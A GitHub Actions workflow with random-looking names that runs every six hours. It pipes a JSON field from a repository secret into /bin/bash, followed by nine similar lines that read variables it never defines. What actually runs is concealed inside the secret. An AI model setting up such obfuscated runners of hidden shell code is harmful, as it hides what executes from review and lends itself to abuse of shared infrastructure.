name: wentgratis
on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wentgratis
        env:
          glj8542: ${{ secrets.glj8542 }}
        run: |
          echo $glj8542 | jq -r .ltonc40531 | /bin/bash
          echo $ije10 | jq -r .a749 | /bin/bash
          echo $qusng2 | jq -r .uigaz6 | /bin/bash
          echo $elyh5167 | jq -r .bypnx3141 | /bin/bash
          echo $g862 | jq -r .vxr00979 | /bin/bash
          echo $brt72105 | jq -r .pdowb3587 | /bin/bash
          echo $bx8546 | jq -r .vlma3 | /bin/bash
          echo $adteo199 | jq -r .ctnpw84642 | /bin/bash
          echo $x1696 | jq -r .rgryq8236 | /bin/bash
          echo $htfa466 | jq -r .vmdb86 | /bin/bash

